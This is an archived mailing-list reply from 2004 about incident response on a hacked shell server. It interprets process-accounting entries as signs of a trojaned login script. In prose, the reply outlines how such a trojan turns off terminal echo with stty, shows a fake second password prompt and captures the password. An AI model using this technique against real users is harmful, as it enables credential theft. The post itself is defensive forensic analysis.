Security Incidents mailing list archives
Re: Strange command histories in hacked shell server
From: Jim Halfpenny <jim () openanswers co uk>
Date: Wed, 22 Dec 2004 09:52:41 +0000 (GMT)
On Fri, 17 Dec 2004 Valdis.Kletnieks () vt edu wrote:
sshd -F tsgan __ 0.02 secs Tue Dec 14 00:27 sh - tsgan ttyp0 0.02 secs Tue Dec 14 00:27 cat - tsgan ttyp0 0.00 secs Tue Dec 14 00:28 su - tsgan ttyp0 0.00 secs Tue Dec 14 00:28 sleep - tsgan ttyp0 0.00 secs Tue Dec 14 00:27 ^^^^^^ stty - tsgan ttyp0 0.00 secs Tue Dec 14 00:27 stty - tsgan ttyp0 0.00 secs Tue Dec 14 00:27 ^^^^^^ fortune - tsgan ttyp0 0.00 secs Tue Dec 14 00:27 ... I don't quite understand why he used sleep and stty commands in above. My suspect is tty hijacking. Am I right? Correct me if I'm wrong.My suspect is that your .login contains a 'fortune', an 'stty' or two, and a 'sleep', and those happened at login - the first *real* command actually issued was probably a 'su -c cat something', after which the person logged out, causing the login 'sh' and 'sshd' to exit.
I'd suggest a trojan was executed which contained commands used to steal passwords. The real login prompt was followed by a short pause (sleep), stty was used to turn of echoing stdin (stty -echo) a false password prompt displayed and the output captured to a file or sent to the intruder in some other fashion. The second stty restored echoing of stdin. My guess is a trojan .login/.profile that prompted a second time for a password after a successful login and then executed the remaining commands e.g. /usr/bin/fortune. Do you remember typing you password in twice, thinking you'd made a typo the first time? Regards, Jim Halfpenny
Current thread:
- Strange command histories in hacked shell server Ganbold (Dec 17)
- Re: Strange command histories in hacked shell server Valdis . Kletnieks (Dec 17)
- Re: Strange command histories in hacked shell server Ganbold (Dec 20)
- Re: Strange command histories in hacked shell server Jim Halfpenny (Dec 22)
- Re: Strange command histories in hacked shell server Valdis . Kletnieks (Dec 17)